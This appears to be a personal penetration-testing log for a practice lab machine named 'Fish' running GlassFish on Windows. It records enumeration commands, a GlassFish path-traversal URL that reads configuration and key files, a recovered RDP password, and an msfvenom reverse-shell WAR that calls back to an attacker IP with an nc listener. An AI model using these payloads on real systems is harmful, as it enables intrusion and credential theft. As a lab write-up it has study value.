Fish
๐งช Pentest Log: {{date:2025-08-15}}
๐ Target Information
- Machine Name: Fish
- IP Address: 192.168.152.168
- Operating System: Windows
ip=192.168.152.168
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 135
rpcclient -U '' -N $ip
Port 139, 445
smbclient -L \\\\$ip\\
enum4linux -a $ip
Port 3389
Port 3700
Port 4848
Google "Glassfish 4.1 exploit", found
https://www.exploit-db.com/exploits/39441
Port 6060
Port 7676
Port 8080, 8181
Web Directory Scan
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
feroxbuster --url http://$ip
wpscan --url http://$ip
dirsearch -u http://$ip -r -o dirsearch.txt
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://$ip$/ -H "Host: FUZZ.website.com"
nikto -h http://$ip
curl -s http://$ip/ | html2markdown
Port 8686
๐ฃ Exploitation / Foothold
๐ Vulnerability Summary
- Service / Port: 4848
- Vulnerability Type: RFI
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
http://192.168.152.168:4848/theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afglassfish4/glassfish/domains/domain1/config/admin-keyfile
http://192.168.152.168:4848/theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afSynaMan/config/AppConfig.xml
xfreerdp /u:arthur /p:'KingOfAtlantis' /v:$ip /drive:shared,/tmp
๐งฌ Privilege Escalation
๐ค Current Access
- User: arthur
- Groups: arthur
- Shell Type: rdp
๐ Enumeration
Network information:
netstat -ano
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: N/A
- Target Binary/Service: N/A
- Reference / Source: N/A
๐ง Exploit Steps
- Setup
http://127.0.0.1:4848
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.45.163 LPORT=443 -f war > shell.war
- Smash to root
nc -lvnp 443